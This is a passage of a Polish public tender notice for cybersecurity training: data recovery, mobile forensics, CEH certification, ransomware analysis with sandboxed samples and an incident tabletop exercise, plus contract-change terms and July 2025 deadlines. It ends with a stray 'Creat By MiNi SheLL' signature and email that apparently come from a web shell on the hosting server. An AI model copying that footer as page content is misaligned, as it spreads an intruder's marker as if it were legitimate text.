Wykonawca musi zapewnić zgodnie z zapisami SWZ załączniki nr 2 OPZ odpowiedni sprzęt <br/>i narzędzia do przeprowadzenia szkoleń, tj.:<br/>Część I - Konieczność zapewnienia odpowiedniego sprzętu laboratoryjnego i narzędzi do odzyskiwania danych, w tym:<br/>•	Stanowiska laboratoryjne do przeprowadzania ćwiczeń z zakresu odzyskiwania danych – tj. komputer dla każdego uczestnika szkolenia z zainstalowanym specjalistycznym oprogramo-waniem z obszaru odzysku danych. (Załącznik nr 19)<br/>Część II - Konieczność zapewnienia odpowiedniego sprzętu laboratoryjnego i narzędzi do analizy smartfonów, odzyskiwania danych oraz inżynierii wstecznej, w tym:<br/>•	stanowiska laboratoryjne do przeprowadzania ćwiczeń z zakresu odzyskiwania danych – tj. komputer dla każdego uczestnika szkolenia z zainstalowanym specjalistycznym oprogramo-waniem z obszaru odzysku danych.<br/>•	smartfony z systemami Android i iOS – sprawne i uszkodzone, z możliwością fizycznej i lo-gicznej ekstrakcji – co najmniej jeden komplet dla każdego uczestnika,<br/>•	sprzęt laboratoryjny: mikroskopy, narzędzia antystatyczne, stacje lutownicze, clean box – min. 6 sztuk<br/>•	nośniki testowe (np. zablokowane lub uszkodzone urządzenia, karty pamięci, pendrive’y, ko-pie zapasowe aplikacji) oraz materiały ćwiczeniowe – po jednym zestawie na uczestnika. (Załącznik nr 20)<br/>Część III - Konieczność zapewnienia odpowiedniego zaplecza technicznego i egzaminacyjnego, w tym:<br/>•	Dostęp dla każdego uczestnika do oficjalnych materiałów szkoleniowych EC-Council (iLabs + eBook) – z pełnym programem szkolenia CEH,<br/>•	Dostęp do środowiska wirtualnego/laboratoryjnego (CEH iLabs) – na cały okres trwania szko-lenia oraz przygotowania do egzaminu,<br/>•	Oficjalny voucher egzaminacyjny CEH dla każdego uczestnika, z możliwością zdawania online lub w autoryzowanym centrum egzaminacyjnym (Załącznik nr 21)<br/>Część IV – Konieczność zapewnienia odpowiedniego sprzętu i środowiska szkoleniowego, w tym:<br/>•	Stanowiska komputerowe z dostępem do środowiska testowego i narzędzi do analizy ran-somware (np. Volatility, FTK, X-Ways, Autopsy, Magnet AXIOM, Wireshark, PEStudio, Cuckoo Sandbox, IDA Free, Ghidra, YARA, Velociraptor) – dla każdego uczestnika szkole-nia<br/>•	Symulacje ataków ransomware w bezpiecznym, odizolowanym środowisku (np. sandbox, maszyny wirtualne) - dla każdego uczestnika szkolenia<br/>•	Analizowane próbki ransomware, logi systemowe, obrazy dysków – po jednym zestawie dla każdego uczestnika,<br/>•	Materiały ćwiczeniowe i instruktażowe – po jednej paczce dla każdego uczestnika, (Załącz-nik nr 22)<br/>Część V - Konieczność zapewnienia odpowiedniego środowiska i materiałów do przeprowadzenia gry sztabowej, w tym:<br/>•	Autorski lub licencjonowany scenariusz gry sztabowej z zakresu obsługi incydentu cyberbez-pieczeństwa (np. ransomware, wyciek danych, atak DDoS, infekcja łańcucha dostaw),<br/>•	Przygotowanie kompletnego środowiska symulacyjnego – role uczestników, zadania, prze-bieg czasowy, warunki eskalacji i komunikacji,<br/>•	Moderacja i prowadzenie gry przez zespół ekspertów, z uwzględnieniem warunków decyzyj-nych, analizy ryzyka, komunikacji kryzysowej oraz wymagań prawnych i proceduralnych,<br/>•	Stanowiska pracy z dostępem do komputerów i materiałów szkoleniowych – po jednym ze-stawie dla każdego uczestnika,<br/>•	Zapewnienie materiałów analitycznych, raportów incydentowych, danych wejściowych i wyjściowych (np. komunikaty prasowe, artefakty techniczne, logi), (Załącznik nr 23)<br/><br/>Na potwierdzenie warunku Wykonawca przedstawi:<br/>Wypełnione oświadczenie dedykowane do każdej części postępowania załącznik:<br/>Część I - (załącznik nr 19)<br/>Część II - (załącznik nr 20)<br/>Część III - (załącznik nr 21)<br/>Część IV - (załącznik nr 22)<br/>Część V- (Załącznik nr 23) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, zgodnie z art. 455 ustawy Prawo Zamówień Publicznych, przewiduje możliwość dokonania zmian postanowień zawartej umowy w sprawie zamówienia publicznego, w sposób i na warunkach określonych w projekcie umowy § 7:<br/>1.	„(…) 3. Zmiany treści Umowy mogą być dokonywane wyłącznie na warunkach określonych w art. 455 PZP w następujących przypadkach: <br/>1)	zmiany przepisów mających wpływ na treść zawartej Umowy, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści Umowy do aktualnego stanu prawnego; <br/>2)	zmiany wynagrodzenia Wykonawcy – spowodowanej wystąpieniem niżej wymienionych okoliczności:<br/>a)	zmiany wysokości stawek podatkowych (...)<br/>b)	zmiany, w trakcie trwania Umowy, kosztów związanych z realizacją zamówienia o 10% w stosunku do kosztów przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie;<br/>3)	wystąpienia siły wyższej, rozumianej jako wydarzenie zewnętrzne, (...)uniemożliwiające wykonanie zamówienia w terminie umownym lub powodujące zmianę zakresu usługi,<br/>4)	inne zmiany: <br/>a)	zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści Umowy,<br/>b)	zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania Umowy, numerów kont bankowych oraz innych danych identyfikacyjnych, <br/>c)	zmiany terminu wykonania Umowy w razie przedłużającej się procedury przetargowej na wyłonienie kolejnego wykonawcy niewynikającej z winy Zamawiającego,<br/>d)	inne przypadki wskazane w art. 455 PZP.<br/>4.	W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany Umowy z przyczyn, o których mowa w ust. 3 , Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany. <br/>5.	Jeżeli Zamawiający uzna, że zaistniałe okoliczności nie stanowią podstawy do zmian Umowy, Wykonawca zobowiązany jest do realizacji zadania zgodnie z warunkami zawartymi w Umowie.<br/>6.	W przypadku zmiany stawki podatku VAT przyjętej przez Wykonawcę w ofercie w toku realizacji Umowy, wynagrodzenie Wykonawcy netto pozostaje bez zmian, a Strony w drodze pisemnego aneksu pod rygorem nieważności wprowadzą do Umowy zmienioną stawkę podatku VAT i nową wartość brutto Umowy, z tym zastrzeżeniem, iż zmiana będzie obowiązywać od chwili podpisania aneksu do Umowy.<br/>7.	W przypadku, o którym mowa w ust. 3 pkt 2 lit. b niniejszego paragrafu, zmianę wynagrodzenia Wykonawcy ustala się z użyciem odesłania do wskaźnika cen producentów (...)<br/>8.	Każda zmiana Umowy wymaga zgody drugiej Strony, z zastrzeżeniem odmiennych postanowień Umowy, w szczególności w zakresie prawa Zamawiającego do złożenia oświadczenia o obniżeniu wynagrodzenia w przypadkach przewidzianych Umową.<br/>9.	Do każdego wniosku o zmianę wysokości wynagrodzenia Strona dołącza wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia należnego Wykonawcy po zmianie Umowy, co nie uchybia innym postanowieniom Umowy, w szczególności odnoszącym się do zasad realizacji robót dodatkowych lub zamiennych.<br/>10.	Zamawiającemu przysługuje w terminie 30 dni od daty otrzymania wniosku Wykonawcy, żądanie udostępnienia do wglądu lub przedłożenia odpisów księgowych dokumentów źródłowych lub innego rodzaju dokumentów i dowodów, w zakresie niezbędnym do oceny zasadności wprowadzenia zmiany, pod rygorem odmowy wprowadzenia zmiany.<br/>11.	Wszelkie zmiany zapisów Umowy, o których mowa w niniejszym paragrafie wymagają zachowania formy pisemnej (...)<br/>12.	Wykonawca ma prawo żądać zmiany wynagrodzenia w przypadku zmiany : <br/>a)	stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b)	wysokości minimalnego wynagrodzenia (...)<br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>d)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, (...)<br/>e)	jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-24 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com